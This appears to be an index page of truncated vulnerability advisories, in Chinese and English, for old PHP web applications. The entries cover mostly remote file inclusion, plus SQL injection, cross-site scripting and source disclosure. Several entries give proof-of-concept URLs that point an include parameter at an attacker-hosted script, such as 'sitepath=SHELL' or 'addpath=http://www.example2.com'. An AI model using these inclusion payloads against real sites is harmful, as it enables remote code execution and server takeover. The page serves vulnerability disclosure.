SQL Injection in SaphpLesson2.0 "show.php"

Discovery by:- Sw33t h4cK3r POWERED BY: SaphpLesson2.0 -------------------------- Exploit : http://Example.com/show/show.php?lessid=SQL...

MyServer文件名解析错误信息泄露漏洞

MyServer是一款HTTP服务程序。 MyServer解析文件名存在问题，远程攻击者可以利用漏洞获得敏感信息。 在提交的脚本URI请求后使用大写的"I"，可导致脚本源代码泄露。 myServer 0.8.9 目前没有详细解决方案提供： http://www.myserverproject.net/ http://www.example.com/cgi-bin/post.mscgI...

FloweRS v2.0 Cross Site Scripting

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Resear...

CodeWand PHPBrowse Include_Stream.Inc.PHP远程文件包含漏洞

CodeWand PHPBrowse是一款基于PHP的WEB应用程序。 CodeWand PHPBrowse不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'IncludeStream.Inc.PHP'脚本对用户提交的'includepath'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 CodeWand phpBrowse 目前没有解决方案提供： http://www.codewand.org/phpBrowse.php...

Sisplet CMS Komentar.PHP远程文件包含漏洞

Sisplet CMS是一款基于PHP的WEB应用程序。 Sisplet CMS不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Komentar.PHP'脚本对用户提交的'sitepath'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Sisplet CMS 05.10 目前没有解决方案提供： https://sourceforge.net/projects/sisplet/ http://www.example.com/path/main/forum/komentar.php?sitepath=SHELL...

Tagit! Tagit2b 2.1.B Build 2 - CONFIGerrmsg.inc.php?configpath Remote File Inclusion

Tagit! Tagit2b 2.1.B Build 2 - CONFIGerrmsg.inc.php?configpath Remote File Inclusion source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues...

NSGalPHP Config.Inc.PHP远程文件包含漏洞

NSGalPHP是一款基于PHP的WEB应用程序。 NSGalPHP不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Config.Inc.PHP'脚本对用户提交的'racineTBS'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 nsGalPHP 目前没有解决方案提供,请关注以下链接： http://www.easy-script.com/compt.php?id=3521 http://www.example.com/path/includes/config.inc.php?racineTBS=PHPSHELL...

PHPMyReport Lib_Head.PHP远程文件包含漏洞

PHPMyReport是一款基于PHP的WEB应用程序。 PHPMyReport不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'LibHead.PHP'脚本对用户提交的'cfgPathModule'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 phpMyTools.org phpMyReporrts 3.0.11 目前没有解决方案提供,请关注以下链接： http://www.phpmytools.org/...

CascadianFaq Index.PHP SQL注入漏洞

CascadianFaq是一款基于PHP的WEB应用程序。 CascadianFaq不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Index.PHP'脚本对用户提交的'catid'参数缺少过滤，提交恶意SQL脚本代码作为参数数据，可更改原来的SQL逻辑，导致获得敏感信息。 Eclectic Designs CascadianFAQ 4.1 目前没有解决方案提供,请关注以下链接： http://eclectic-designs.com/cascadianfaq.php...

Indexu 5.0/5.3 - 'tell_friend.php' Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in th...

AllMyGuests远程文件包含漏洞

AllMyGuests是一款基于PHP的WEB应用程序。 AllMyGuests不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'AMGserverpath'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 AllMyPHP AllMyGuests 0.3 目前没有解决方案提供： http://www.php-resource.net/content-12.html http://example.com/include/submit.inc.php?AMGserverpath=attacker's...

Magic Photo Storage Website - includeconfig.php?_config[site_path] Remote File Inclusion

Magic Photo Storage Website - includeconfig.php?configsitepath Remote File Inclusion source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting...

PgmReloaded远程文件包含漏洞

PgmReloaded是一款基于PHP的WEB应用程序。 PgmReloaded不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的WEB参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 PgmReloaded PgmReloaded 0.8.5 目前没有解决方案提供： http://www.matteolucarelli.net/pgmreloaded/indexen.htm http://example.com/index.php?lang=attacker's site...

CWMExplorer Index.PHP源代码信息泄露漏洞

CWMExplorer是一款基于PHP的WEB应用程序。 CWMExplorer不正确过滤用户提交的输入，远程攻击者可以利用漏洞获得敏感信息。 问题是'index.php'脚本对用户提交的'file'参数缺少过滤，提交脚本文件作为参数，可导致源代码泄露。 cwm-design cwmExplorer 1.0 http://explorer.cwm-design.de/ http://www.example.com/path/index.php?d=0&showfile=file...

Azucar CMS Index_sitios.PHP远程文件包含漏洞

Azucar CMS是一款基于PHP的WEB应用程序。 Azucar CMS不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Indexsitios.PHP'脚本对用户提交的'VIEW'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Azucar CMS Azucar CMS 1.3 目前没有详细解决方案提供： http://azucarcms.sourceforge.net/...

Fire Soft Board Demarrage.PHP参数远程文件包含漏洞

Fire Soft Board是一款基于PHP的论坛程序。 Fire Soft Board不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Demarrage.PHP'脚本对用户提交的'racine'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Fire Soft Board Fire Soft Board RC3 目前没有解决方案提供,请关注以下链接： http://www.fire-soft-board.com/...

CM68 News Oldnews.Inc.PHP远程文件包含漏洞

CM68 News是一款基于PHP的WEB应用程序。 CM68 News不充分过滤用户提交的URI输入，远程攻击者可以利用漏洞以WEB进程权限执行任意指令。 问题是'Oldnews.Inc.PHP'脚本对用户提交的'addpath'参数缺少过滤，指定远程服务器上的任意文件作为包含对象，可导致以进程权限执行任意指令。 CM68 News 12.02.06 http://www.cm68.de/ http://www.example.com/engine/oldnews.inc.php?addpath=http://www.example2.com...

WEBinsta Mailing List Manager Install3.PHP远程文件包含漏洞

WEBinsta Mailing List Manager是一款基于PHP的邮件列表程序. WEBinsta Mailing List Manager不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'install3.php'脚本对用户提交的'cabsolutepath'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 WEBInsta WEBinsta Mailing List Manager 1.3.e http://www.tonybibbs.com/index.php?topic=MVCnPHP...

ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (1)

source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecti...

SIPS v 0.2.2 < = Remote File Include Vulnerability

SIPS v 0.2.2 = = = = = = = = = = = = = Remote File Include Vulnerability ; Discovred By : ThELeO ; Software : SIPS v 0.2.2 ; Exploit : http://Www.Example.Com/Script/sipssys/code/box.inc.php?config"sipssys"=U r Evil Script ; Greetz : M.I.D.TDrackanZ, Mr.IlysS, NeThug47, Death & All Moroccan & Arab...